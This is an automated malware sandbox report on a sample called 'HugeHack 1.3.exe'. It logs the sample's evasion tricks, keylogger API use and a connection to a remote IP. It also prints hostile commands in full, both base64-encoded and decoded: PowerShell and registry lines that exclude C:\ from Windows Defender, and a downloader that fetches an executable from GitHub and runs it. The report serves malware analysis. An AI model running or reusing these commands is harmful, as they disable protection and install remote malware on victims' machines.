Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: WIRESHARK.EXE

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Memory allocated: 1120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Memory allocated: 1320000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: B60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 4930000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 31B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1500000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 65B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 75B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 35B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 55B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 4700000 memory commit \| memory reserve \| memory write watch

Contains functionality to detect virtual machines (SLDT)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 5_3_151FE91C sldt word ptr [eax]

5_3_151FE91C

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599685	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598026	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597503	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 375
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1554
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 422
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 1009
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 630
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1740

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\Payload.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe TID: 7644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -599828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -599685s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -598026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -597503s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228	Thread sleep count: 407 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2996	Thread sleep time: -211000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2996	Thread sleep time: -77500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1384	Thread sleep count: 1740 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 7568	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3340	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599685	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598026	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597503	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000004.00000003.1307246955.0000000003479000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: wscript.exe, 00000001.00000002.1270361152.0000000002C98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPL
Source: webhook.exe, 00000003.00000002.1327126250.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

.NET source code references suspicious native API functions

Source: Payload.exe.0.dr, kl.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: Payload.exe.0.dr, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Payload.exe.0.dr, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\

Encrypted powershell cmdline option found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
